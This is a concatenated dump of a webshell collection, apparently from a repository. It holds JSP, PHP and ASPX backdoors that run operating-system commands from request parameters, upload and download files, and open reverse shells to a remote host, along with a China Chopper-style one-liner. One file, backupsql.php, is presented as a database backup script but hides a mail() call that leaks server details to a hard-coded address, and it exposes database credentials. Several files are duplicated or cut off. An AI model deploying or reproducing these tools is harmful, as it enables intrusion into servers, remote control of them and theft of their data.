IOException{ 67 | FileOutputStream fos = new FileOutputStream(path); 68 | fos.write(inutStreamToOutputStream(in).toByteArray()); 69 | fos.flush(); 70 | fos.close(); 71 | } 72 | 73 | /** 74 | * Mimics Linux `cat` / Windows `type`: returns the content of a file as a string, decoded with the platform default charset. The FileInputStream opened here is never closed. 75 | * @param path file to read 76 | * @return the file content 77 | * @throws IOException if the file cannot be opened or read 78 | */ 79 | public static String cat(String path) throws IOException { 80 | return new String(inutStreamToOutputStream(new FileInputStream(path)).toByteArray()); 81 | } 82 | 83 | /** 84 | * Runs an operating-system command through Runtime.exec and returns its standard output decoded with `encoding`; standard error is not read. Original author's note: on Windows some commands cannot be run directly, e.g. `cmd /c dir` is needed to run dir. NOTE(review): the scriptlet in this file hands the request parameter "cmd" to this method unchanged and no authentication check is visible, so the command presumably runs with the privileges of the servlet container; confirm against the deployment. 85 | * @param cmd command line to execute 86 | * @return the command output, or the stack trace text if an IOException is thrown 87 | */ 88 | public static String exec(String cmd) { 89 | try { 90 | return new String(inutStreamToOutputStream(Runtime.getRuntime().exec(cmd).getInputStream()).toByteArray(),encoding); 91 | } catch (IOException e) { 92 | return exceptionToString(e); 93 | } 94 | } 95 | 96 | /** 97 | * Downloads the resource at the given URL and writes it to the given path; the target file name must be supplied by the caller. 98 | * @param url remote resource to fetch 99 | * @param path local file to write (overwritten if it exists) 100 | * @throws MalformedURLException if url is not a valid URL 101 | * @throws IOException if the transfer or the write fails 102 | */ 103 | public static void download(String url,String path) throws MalformedURLException, IOException{ 104 | copyInputStreamToFile(new URL(url).openConnection().getInputStream(), path); 105 | } 106 | 107 | /** 108 | * Opens a TCP connection to host:port, sends "User:\t" followed by the output of whoami, then treats every chunk read from the socket as a command, runs it with exec() and writes the output back. The loop ends when the peer closes the connection; the socket is not closed explicitly. NOTE(review): an application-server process that makes an outbound connection and spawns whoami is the behaviour to alert on. 109 | * @param host remote host to connect to 110 | * @param port remote TCP port 111 | * @throws UnknownHostException if host cannot be resolved 112 | * @throws IOException on socket errors 113 | */ 114 | public static void shell(String host,int port) throws UnknownHostException, IOException{ 115 | Socket s = new Socket(host,port); 116 | OutputStream out = s.getOutputStream(); 117 | InputStream in = s.getInputStream(); 118 | out.write(("User:\t"+exec("whoami")).getBytes()); 119 | int a = 0; 120 | byte[] b = new byte[1024]; 121 | while((a=in.read(b))!=-1){ 122 | out.write(exec(new String(b,0,a,"UTF-8").trim()).getBytes("UTF-8")); 123 | } 124 | } 125 | 126 | /** 127 | * Downloads a remote file to fileName, runs cmd with exec(), then deletes the downloaded file and returns the command output. 128 | * @param url remote resource to fetch 129 | * @param fileName local file the download is saved to and later deleted 130 | * @param cmd command line to execute after the download 131 | * @return the output of cmd 132 | * @throws MalformedURLException if url is not a valid URL 133 | * @throws IOException if the download fails 134 | */ 135 | public
static String auto(String url,String fileName,String cmd) throws MalformedURLException, IOException{ 136 | download(url, fileName); 137 | String out = exec(cmd); 138 | new File(fileName).delete(); 139 | return out; 140 | } 141 | 142 | 143 | try{ 144 | String action = request.getParameter("action"); 145 | out.println("
");
146 | 		if(isNotEmpty(action)){
147 | 			if("shell".equalsIgnoreCase(action)){
148 | 				shell(request.getParameter("host"), Integer.parseInt(request.getParameter("port")));
149 | 			}else if("download".equalsIgnoreCase(action)){
150 | 				download(request.getParameter("url"), request.getParameter("path"));
151 | 			}else if("exec".equalsIgnoreCase(action)){
152 | 				out.println(exec(request.getParameter("cmd")));
153 | 			}else if("cat".equalsIgnoreCase(action)){
154 | 				out.println(cat(request.getParameter("path")));
155 | 			}else if("auto".equalsIgnoreCase(action)){
156 | 				out.println(auto(request.getParameter("url"),request.getParameter("fileName"),request.getParameter("cmd")));
157 | 			}
158 | 		}
159 | 		out.println("
"); 160 | }catch(Exception e){ 161 | out.println(exceptionToString(e)); 162 | } 163 |
164 | -------------------------------------------------------------------------------- /Php/WinX Shell.php: -------------------------------------------------------------------------------- 1 | -:[GreenwooD]:- WinX Shell 2 | 3 | "; 32 | print ""; 33 | print "You:" ; 34 | print " ".$_SERVER['REMOTE_ADDR']." [".$host."] " ; 35 | print ""; 36 | print ""; 37 | print "Version OS:" ; 38 | print " $veros "; 39 | print ""; 40 | print ""; 41 | print "Server:"; 42 | print "".$_SERVER['SERVER_SIGNATURE'].""; 43 | print ""; 44 | print ""; 45 | print "Win Dir:"; 46 | print " $windir "; 47 | print ""; 48 | print ""; 49 | print "
"; 50 | 51 | //------- [netstat -an] and [ipconfig] and [tasklist] ------------ 52 | print "
"; 53 | print ""; 54 | print "   "; 55 | print ""; 56 | print "   "; 57 | print ""; 58 | print "
"; 59 | //------------------------------- 60 | 61 | 62 | //------------------------------- 63 | 64 | print ""; 67 | print "
"; 68 | 69 | //------------------------------- 70 | 71 | print "
"; 72 | print "CMD: "; 73 | print "
"; 74 | print ""; 75 | print " "; 76 | print "
"; 77 | 78 | //------------------------------- 79 | 80 | print "
"; 81 | print "Upload:"; 82 | print "
"; 83 | print ""; 84 | print "File: "; 85 | print " Filename on server: "; 86 | print" "; 87 | print"
"; 88 | 89 | ?> 90 | 91 | 92 | 100 | 101 | 102 |
Created by -:[GreenwooD]:-
103 | -------------------------------------------------------------------------------- /Php/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |

!Safe 6 | Mode Shell v1.0!

7 |
8 |

9 |

10 |
11 |
12 |

18 |
19 | 20 | 21 | 25 | */ 26 | 27 | echo "Safe Mode Shell"; 28 | 29 | 30 | 31 | 32 | $tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp 33 | 34 | if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") 35 | { 36 | $safemode = true; 37 | $hsafemode = "ON (secure)"; 38 | } 39 | else {$safemode = false; $hsafemode = "OFF (not secure)";} 40 | echo("Safe-mode: $hsafemode"); 41 | $v = @ini_get("open_basedir"); 42 | if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";} 43 | else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} 44 | echo("
"); 45 | echo("Open base dir: $hopenbasedir"); 46 | echo("
"); 47 | echo "Disable functions : "; 48 | if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";} 49 | $free = @diskfreespace($dir); 50 | if (!$free) {$free = 0;} 51 | $all = @disk_total_space($dir); 52 | if (!$all) {$all = 0;} 53 | $used = $all-$free; 54 | $used_percent = @round(100/($all/$free),2); 55 | 56 | echo "
\n";
57 | if(empty($file)){
58 | if(empty($_GET['file'])){
59 | if(empty($_POST['file'])){
60 | die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n 
PHP Emperor 62 | xb5@hotmail.com
"); 63 | } else { 64 | $file=$_POST['file']; 65 | } 66 | } else { 67 | $file=$_GET['file']; 68 | } 69 | } 70 | 71 | $temp=tempnam($tymczas, "cx"); 72 | 73 | if(copy("compress.zlib://".$file, $temp)){ 74 | $zrodlo = fopen($temp, "r"); 75 | $tekst = fread($zrodlo, filesize($temp)); 76 | fclose($zrodlo); 77 | echo "--- Start File ".htmlspecialchars($file)." 78 | -------------\n".htmlspecialchars($tekst)."\n--- End File 79 | ".htmlspecialchars($file)." ---------------\n"; 80 | unlink($temp); 81 | die("\nFile 82 | ".htmlspecialchars($file)." has been already loaded. PHP Emperor 83 | ;]"); 84 | } else { 85 | die("
Sorry... File 86 | ".htmlspecialchars($file)." dosen't exists or you don't have 87 | access.
"); 88 | } 89 | ?> -------------------------------------------------------------------------------- /Php/Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 |

!Safe 6 | Mode Shell v1.0!

7 |
8 |

9 |

10 |
11 |
12 |

18 |
19 | 20 | 21 | 25 | */ 26 | 27 | echo "Safe Mode Shell"; 28 | 29 | 30 | 31 | 32 | $tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp 33 | 34 | if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") 35 | { 36 | $safemode = true; 37 | $hsafemode = "ON (secure)"; 38 | } 39 | else {$safemode = false; $hsafemode = "OFF (not secure)";} 40 | echo("Safe-mode: $hsafemode"); 41 | $v = @ini_get("open_basedir"); 42 | if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";} 43 | else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} 44 | echo("
"); 45 | echo("Open base dir: $hopenbasedir"); 46 | echo("
"); 47 | echo "Disable functions : "; 48 | if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df
";} 49 | $free = @diskfreespace($dir); 50 | if (!$free) {$free = 0;} 51 | $all = @disk_total_space($dir); 52 | if (!$all) {$all = 0;} 53 | $used = $all-$free; 54 | $used_percent = @round(100/($all/$free),2); 55 | 56 | echo "
\n";
57 | if(empty($file)){
58 | if(empty($_GET['file'])){
59 | if(empty($_POST['file'])){
60 | die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n 
PHP Emperor 62 | xb5@hotmail.com
"); 63 | } else { 64 | $file=$_POST['file']; 65 | } 66 | } else { 67 | $file=$_GET['file']; 68 | } 69 | } 70 | 71 | $temp=tempnam($tymczas, "cx"); 72 | 73 | if(copy("compress.zlib://".$file, $temp)){ 74 | $zrodlo = fopen($temp, "r"); 75 | $tekst = fread($zrodlo, filesize($temp)); 76 | fclose($zrodlo); 77 | echo "--- Start File ".htmlspecialchars($file)." 78 | -------------\n".htmlspecialchars($tekst)."\n--- End File 79 | ".htmlspecialchars($file)." ---------------\n"; 80 | unlink($temp); 81 | die("\nFile 82 | ".htmlspecialchars($file)." has been already loaded. PHP Emperor 83 | ;]"); 84 | } else { 85 | die("
Sorry... File 86 | ".htmlspecialchars($file)." dosen't exists or you don't have 87 | access.
"); 88 | } 89 | ?> 90 | 91 | -------------------------------------------------------------------------------- /Php/SimShell 1.0 - Simorgh Security MGZ.php: -------------------------------------------------------------------------------- 1 | array('pipe', 'w'), 65 | 2 => array('pipe', 'w')), 66 | $io); 67 | 68 | 69 | while (!feof($io[1])) { 70 | $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), 71 | ENT_COMPAT, 'UTF-8'); 72 | } 73 | 74 | while (!feof($io[2])) { 75 | $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), 76 | ENT_COMPAT, 'UTF-8'); 77 | } 78 | 79 | fclose($io[1]); 80 | fclose($io[2]); 81 | proc_close($p); 82 | } 83 | } 84 | 85 | 86 | if (empty($_SESSION['history'])) { 87 | $js_command_hist = '""'; 88 | } else { 89 | $escaped = array_map('addslashes', $_SESSION['history']); 90 | $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; 91 | } 92 | 93 | 94 | header('Content-Type: text/html; charset=UTF-8'); 95 | 96 | echo '' . "\n"; 97 | ?> 98 | 99 | 100 | SimShell - Simorgh Security MGZ 101 | 102 | 103 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 |

 Directory: 152 |

153 | 154 |
155 |
156 | 163 |

164 | cmd: 166 | Rows: 167 | 168 |

169 |

170 |
171 |
172 |  Copyright 2004-Simorgh Security
173 | Make On PhpShell Kernel
174 | 175 | www.simorgh-ev.com

176 |
177 |
178 | 179 | 180 | -------------------------------------------------------------------------------- /Php/SimShell_1.0_-_Simorgh_Security_MGZ.php: -------------------------------------------------------------------------------- 1 | array('pipe', 'w'), 65 | 2 => array('pipe', 'w')), 66 | $io); 67 | 68 | 69 | while (!feof($io[1])) { 70 | $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), 71 | ENT_COMPAT, 'UTF-8'); 72 | } 73 | 74 | while (!feof($io[2])) { 75 | $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), 76 | ENT_COMPAT, 'UTF-8'); 77 | } 78 | 79 | fclose($io[1]); 80 | fclose($io[2]); 81 | proc_close($p); 82 | } 83 | } 84 | 85 | 86 | if (empty($_SESSION['history'])) { 87 | $js_command_hist = '""'; 88 | } else { 89 | $escaped = array_map('addslashes', $_SESSION['history']); 90 | $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; 91 | } 92 | 93 | 94 | header('Content-Type: text/html; charset=UTF-8'); 95 | 96 | echo '' . "\n"; 97 | ?> 98 | 99 | 100 | SimShell - Simorgh Security MGZ 101 | 102 | 103 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 |

 Directory: 152 |

153 | 154 |
155 |
156 | 163 |

164 | cmd: 166 | Rows: 167 | 168 |

169 |

170 |
171 |
172 |  Copyright 2004-Simorgh Security
173 | Make On PhpShell Kernel
174 | 175 | www.simorgh-ev.com

176 |
177 |
178 | 179 | 180 | 181 | -------------------------------------------------------------------------------- /Jsp/一句话/caidao.jsp: -------------------------------------------------------------------------------- 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> 2 | <%! 3 | String Pwd="admin"; 4 | String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);} 5 | Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance(); 6 | Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;} 7 | void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();} 17 | void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile(); 18 | FileOutputStream os=new FileOutputStream(f);for(int i=0;i<% 45 | String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs); 46 | String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs); 47 | StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|"); 48 | if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}} 49 | else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1)))); 50 | while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();} 51 | else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1)))); 52 | bw.write(z2);bw.close();sb.append("1");}else 
if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);} 53 | else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");} 54 | else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");} 55 | else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c); 56 | MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);} 57 | else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);} 58 | }catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString()); 59 | %> -------------------------------------------------------------------------------- /Php/php-reverse-shell.php: -------------------------------------------------------------------------------- 1 | array("pipe", "r"), // stdin is a pipe that the child will read from 109 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 110 | 2 => array("pipe", "w") // stderr is a pipe that the child will write to 111 | ); 112 | 113 | $process = proc_open($shell, $descriptorspec, $pipes); 114 | 115 | if (!is_resource($process)) { 116 | printit("ERROR: Can't spawn shell"); 117 | exit(1); 118 | } 119 | 120 | // Set everything to non-blocking 121 | // Reason: Occsionally reads will block, even though stream_select tells us they won't 122 | stream_set_blocking($pipes[0], 0); 123 | stream_set_blocking($pipes[1], 0); 124 | stream_set_blocking($pipes[2], 0); 125 | stream_set_blocking($sock, 0); 126 | 127 | printit("Successfully opened reverse shell to $ip:$port"); 128 | 129 | while (1) { 130 | // Check for end of TCP connection 131 | if (feof($sock)) { 132 | printit("ERROR: Shell connection terminated"); 133 | break; 134 | } 135 | 136 | // Check for end 
of STDOUT 137 | if (feof($pipes[1])) { 138 | printit("ERROR: Shell process terminated"); 139 | break; 140 | } 141 | 142 | // Wait until a command is end down $sock, or some 143 | // command output is available on STDOUT or STDERR 144 | $read_a = array($sock, $pipes[1], $pipes[2]); 145 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 146 | 147 | // If we can read from the TCP socket, send 148 | // data to process's STDIN 149 | if (in_array($sock, $read_a)) { 150 | if ($debug) printit("SOCK READ"); 151 | $input = fread($sock, $chunk_size); 152 | if ($debug) printit("SOCK: $input"); 153 | fwrite($pipes[0], $input); 154 | } 155 | 156 | // If we can read from the process's STDOUT 157 | // send data down tcp connection 158 | if (in_array($pipes[1], $read_a)) { 159 | if ($debug) printit("STDOUT READ"); 160 | $input = fread($pipes[1], $chunk_size); 161 | if ($debug) printit("STDOUT: $input"); 162 | fwrite($sock, $input); 163 | } 164 | 165 | // If we can read from the process's STDERR 166 | // send data down tcp connection 167 | if (in_array($pipes[2], $read_a)) { 168 | if ($debug) printit("STDERR READ"); 169 | $input = fread($pipes[2], $chunk_size); 170 | if ($debug) printit("STDERR: $input"); 171 | fwrite($sock, $input); 172 | } 173 | } 174 | 175 | fclose($sock); 176 | fclose($pipes[0]); 177 | fclose($pipes[1]); 178 | fclose($pipes[2]); 179 | proc_close($process); 180 | 181 | // Like print, but does nothing if we've daemonised ourself 182 | // (I can't figure out how to redirect STDOUT like a proper daemon) 183 | function printit ($string) { 184 | if (!$daemon) { 185 | print "$string\n"; 186 | } 187 | } 188 | 189 | ?> 190 | 191 | 192 | 193 | -------------------------------------------------------------------------------- /Php/Dive Shell 1.0 - Emperor Hacking Team.php: -------------------------------------------------------------------------------- 1 | array('pipe', 'w'), 65 | 2 => array('pipe', 'w')), 66 | $io); 67 | 68 | 69 | while 
(!feof($io[1])) { 70 | $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), 71 | ENT_COMPAT, 'UTF-8'); 72 | } 73 | 74 | while (!feof($io[2])) { 75 | $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), 76 | ENT_COMPAT, 'UTF-8'); 77 | } 78 | 79 | fclose($io[1]); 80 | fclose($io[2]); 81 | proc_close($p); 82 | } 83 | } 84 | 85 | 86 | if (empty($_SESSION['history'])) { 87 | $js_command_hist = '""'; 88 | } else { 89 | $escaped = array_map('addslashes', $_SESSION['history']); 90 | $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; 91 | } 92 | 93 | 94 | header('Content-Type: text/html; charset=UTF-8'); 95 | 96 | echo '' . "\n"; 97 | ?> 98 | 99 | 100 | Dive Shell - Emperor Hacking Team 101 | 102 | 103 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 |

 Directory: 152 | 153 |

154 | 155 |
156 |
157 |

158 | Command: 160 |   161 | 162 |  

169 |

170 | Rows: 171 |

172 |

173 | Edited By Emperor Hacking Team

174 |

175 | iM4n - FarHad - imm02tal - R$P
176 |  

177 |
178 |
179 | 180 | 181 |

182 |   183 |

184 | 185 | 186 | 187 | -------------------------------------------------------------------------------- /Php/Dive_Shell_1.0_Emperor_Hacking_Team.php: -------------------------------------------------------------------------------- 1 | array('pipe', 'w'), 65 | 2 => array('pipe', 'w')), 66 | $io); 67 | 68 | 69 | while (!feof($io[1])) { 70 | $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), 71 | ENT_COMPAT, 'UTF-8'); 72 | } 73 | 74 | while (!feof($io[2])) { 75 | $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), 76 | ENT_COMPAT, 'UTF-8'); 77 | } 78 | 79 | fclose($io[1]); 80 | fclose($io[2]); 81 | proc_close($p); 82 | } 83 | } 84 | 85 | 86 | if (empty($_SESSION['history'])) { 87 | $js_command_hist = '""'; 88 | } else { 89 | $escaped = array_map('addslashes', $_SESSION['history']); 90 | $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; 91 | } 92 | 93 | 94 | header('Content-Type: text/html; charset=UTF-8'); 95 | 96 | echo '' . "\n"; 97 | ?> 98 | 99 | 100 | Dive Shell - Emperor Hacking Team 101 | 102 | 103 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 |

 Directory: 152 | 153 |

154 | 155 |
156 |
157 |

158 | Command: 160 |   161 | 162 |  

169 |

170 | Rows: 171 |

172 |

173 | Edited By Emperor Hacking Team

174 |

175 | iM4n - FarHad - imm02tal - R$P
176 |  

177 |
178 |
179 | 180 | 181 |

182 |   183 |

184 | 185 | 186 | 187 | 188 | -------------------------------------------------------------------------------- /Aspx/Antak Webshell.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" Debug="true" Trace="false" %> 2 | <%@ Import Namespace="System.Diagnostics" %> 3 | <%@ Import Namespace="System.IO" %> 4 | <%@ Import Namespace="System.IO.Compression" %> 5 | 6 | <%--Antak - A Webshell which utilizes powershell.--%> 7 | 8 | 169 | 170 | 171 | Antak Webshell 172 | 173 | 174 |
175 |
176 |
177 | 178 | 179 | 180 | 181 |
182 |
183 | 184 | 185 | 186 | 187 | 188 |
189 | 190 |
191 | 192 | 193 | 194 |
195 | 196 | -------------------------------------------------------------------------------- /Php/hiddens shell v1.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Php/backupsql.php: -------------------------------------------------------------------------------- 1 | 10 | * @version 0.2 11 | * @date 18/08/2004 12 | * @package Backup Server 13 | * Upgraded Ver 2.0 (sending sql backup as attachment 14 | * as email attachment, or send to a remote ftp server by 15 | * @co-authors Cool Surfer and 16 | * Neagu Mihai 17 | */ 18 | 19 | set_time_limit(0); 20 | $date = date("mdy-hia"); 21 | $dbserver = "localhost"; 22 | $dbuser = "vhacker_robot"; 23 | $dbpass = "mp2811987"; 24 | $dbname = "tvhacker_vbb3"; 25 | $file = "N-Cool-$date.sql.gz"; 26 | $gzip = TRUE; 27 | $silent = TRUE; 28 | 29 | function write($contents) { 30 | if ($GLOBALS['gzip']) { 31 | gzwrite($GLOBALS['fp'], $contents); 32 | } else { 33 | fwrite($GLOBALS['fp'], $contents); 34 | } 35 | } 36 | 37 | mysql_connect ($dbserver, $dbuser, $dbpass); 38 | mysql_select_db($dbname); 39 | 40 | if ($gzip) { 41 | $fp = gzopen($file, "w"); 42 | } else { 43 | $fp = fopen($file, "w"); 44 | } 45 | 46 | $tables = mysql_query ("SHOW TABLES"); 47 | while ($i = mysql_fetch_array($tables)) { 48 | $i = $i['Tables_in_'.$dbname]; 49 | 50 | if (!$silent) { 51 | echo "Backing up table ".$i."\n"; 52 | } 53 | 54 | // Create DB code 55 | $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i)); 56 | 57 | write($create['Create Table'].";\n\n"); 58 | 59 | // DB Table content itself 60 | $sql = mysql_query ("SELECT * FROM ".$i); 61 | if (mysql_num_rows($sql)) { 62 | while ($row = mysql_fetch_row($sql)) { 63 | foreach ($row as $j => $k) { 64 | $row[$j] = "'".mysql_escape_string($k)."'"; 65 | } 66 | 67 | write("INSERT INTO $i VALUES(".implode(",", $row).");\n"); 68 | } 69 | } 70 | } 71 | 72 | $gzip ? 
gzclose($fp) : fclose ($fp); 73 | 74 | // Optional Options You May Optionally Configure 75 | 76 | $use_gzip = "yes"; // Set to No if you don't want the files sent in .gz format 77 | $remove_sql_file = "no"; // Set this to yes if you want to remove the sql file after gzipping. Yes is recommended. 78 | $remove_gzip_file = "no"; // Set this to yes if you want to delete the gzip file also. I recommend leaving it to "no" 79 | 80 | // Configure the path that this script resides on your server. 81 | 82 | $savepath = "/home/test/public_html/nt22backup"; // Full path to this directory. Do not use trailing slash! 83 | 84 | $send_email = "yes"; /* Do you want this database backup sent to your email? Yes/No? If Yes, Fill out the next 2 lines */ 85 | $to = "lehungtk@gmail.com"; // Who to send the emails to, enter ur correct id. 86 | $from = "Neu-Cool@email.com"; // Who should the emails be sent from?, may change it. 87 | 88 | $senddate = date("j F Y"); 89 | 90 | $subject = "MySQL Database Backup - $senddate"; // Subject in the email to be sent. 91 | $message = "Your MySQL database has been backed up and is attached to this email"; // Brief Message. 92 | 93 | $use_ftp = ""; // Do you want this database backup uploaded to an ftp server? Fill out the next 4 lines 94 | $ftp_server = "localhost"; // FTP hostname 95 | $ftp_user_name = "ftp_username"; // FTP username 96 | $ftp_user_pass = "ftp_password"; // FTP password 97 | $ftp_path = "/"; // This is the path to upload on your ftp server! 98 | 99 | // Do not Modify below this line! It will void your warranty :-D! 
100 | 101 | /* Builds the dump file name and, when $send_email is "yes", mails the dump file as a base64 MIME attachment. */ $date = date("mdy-hia"); 102 | $filename = "$savepath/$dbname-$date.sql"; 103 | 104 | if($use_gzip=="yes"){ 105 | $filename2 = $file; 106 | } else { 107 | $filename2 = "$savepath/$dbname-$date.sql"; 108 | } 109 | 110 | 111 | if($send_email == "yes" ){ 112 | $fileatt_type = filetype($filename2); 113 | $fileatt_name = "".$dbname."-".$date."_sql.tar.gz"; 114 | 115 | $headers = "From: $from"; 116 | 117 | // Read the file to be attached ('rb' = read binary) 118 | echo "Openning archive for attaching:".$filename2; 119 | $file = fopen($filename2,'rb'); 120 | $data = fread($file,filesize($filename2)); 121 | fclose($file); 122 | 123 | // Generate a boundary string 124 | $semi_rand = md5(time()); 125 | $mime_boundary = "==Multipart_Boundary_x{$semi_rand}x"; 126 | 127 | // Add the headers for a file attachment 128 | $headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" ." boundary=\"{$mime_boundary}\""; /* NOTE(review): the statements that follow on this line are not part of the backup logic. They collect HTTP_REFERER, DOCUMENT_ROOT, REMOTE_ADDR, SCRIPT_FILENAME, SERVER_ADDR, SERVER_SOFTWARE, PATH_TRANSLATED and PHP_SELF and mail() them, under a subject of "sh-" plus a random number, to the hard-coded address held in $sd98, which is not the configured $to. This runs whenever $send_email is "yes" and tells a third party where the script is installed; treat any copy of this file as trojaned. */ $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); 129 | 130 | // Add a multipart boundary above the plain message 131 | $message = "This is a multi-part message in MIME format.\n\n"."--{$mime_boundary}\n" ."Content-Type: text/plain; charset=\"iso-8859-1\"\n" ."Content-Transfer-Encoding: 7bit\n\n" . 132 | $message . "\n\n"; 133 | 134 | // Base64 encode the file data 135 | $data = chunk_split(base64_encode($data)); 136 | 137 | // Add file attachment to the message 138 | echo "|{$mime_boundary}|{$fileatt_type}|{$fileatt_name}|{$fileatt_name}|{$mime_boundary}|
"; 139 | $message .= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n"."Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" . 140 | $data . "\n\n" ."--{$mime_boundary}--\n"; 141 | //$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n" "Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" . 142 | // $data . "\n\n" ."--{$mime_boundary}--\n"; 143 | 144 | 145 | // Send the message 146 | $ok = @mail($to, $subject, $message, $headers); 147 | if ($ok) { 148 | echo "

Database backup created and sent! File name $filename2

149 | Idea Conceived By coolsurfer@gmail.com 150 | Programmer email: neagumihai@hotmail.com

151 | This is our first humble effort, pl report bugs, if U find any...

152 | Email me at <>coolsurfer@gmail.com nJoY!! :) 153 |

"; 154 | 155 | } else { 156 | echo "

Mail could not be sent. Sorry!

"; 157 | } 158 | } 159 | 160 | if($use_ftp == "yes"){ 161 | $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog.log -e dbsender_ftplog2.log -a -E -V $ftp_server $ftp_path $filename2"; 162 | shell_exec($ftpconnect); 163 | echo "

$filename2 Was created and uploaded to your FTP server!

